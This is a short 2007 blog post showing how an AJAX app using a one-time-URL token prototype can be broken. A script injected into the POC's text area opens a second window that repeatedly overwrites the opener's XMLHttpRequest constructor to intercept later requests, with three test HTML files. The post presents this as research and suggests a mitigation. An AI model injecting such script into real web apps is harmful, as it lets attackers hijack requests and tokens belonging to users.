Monday, March 26, 2007

One time URLs broken for AJAX apps

After finding the first obvious way to break OneTimeURLPrototype , I want to present another possibility where it will fail.


The prototype itself is not vulnerable, but if an AJAX app uses this prototype to get one time token, is likely to be vulnerable.


Basis of this is that XMLHttpRequest constructor is not protected in the prototype.


The key is to open a new window-2 from original window-1, write the code in window-2 which keeps overwriting XMLHTTPRequest object of window-1 periodically. Whenever an XMLHTTPRequest is sent from window-1 (Not the one during page load of window-1, but the one sent after page load is complete), window-2 will know about it.


Use of window-2 enables us to do this ACROSS pages.


Thus another addition to POC will be to "protect" XMLHTTPRequest in window-1 by making a copy of it while it is loading.



Following is what you paste in the text area of POC

<script>
w=window.open();
w.document.write( < xmlHttpOverWriteCode> );
</script>


Here is '< xmlHttpOverWriteCode>'
<script>
function dummy(){};
dummy.prototype.open = function(a, b, c) {alert('open called ' + a + b + c)};
window.setInterval("trapIt()", 100);
function trapIt ()
{
opener.XMLHttpRequest = dummy;
}
</script>








Here is what I used to experiment this,
Create 3 htmls in same directory with names new[1-3].html
Add the respective code to them (that follows)
Open new1.html in the browser

New1.html

<body>
<script>
window.open("New2.html");
location = "New3.html";
</script>
</body>



New2.html

<body>
<script>
function dummy(){};
dummy.prototype.open = function(a, b, c) {alert('open called ' + a + b + c)};
window.setInterval("xml()", 9000);
function xml ()
{
opener.XMLHttpRequest = dummy;
}
</script>
</body>



New3.html

<body>
<script>
window.setInterval("xml()", 10000);
function xml ()
{
var a = new XMLHttpRequest ();
a.open("HEAD", "/faq/index.html",true);
}
</script>
</body>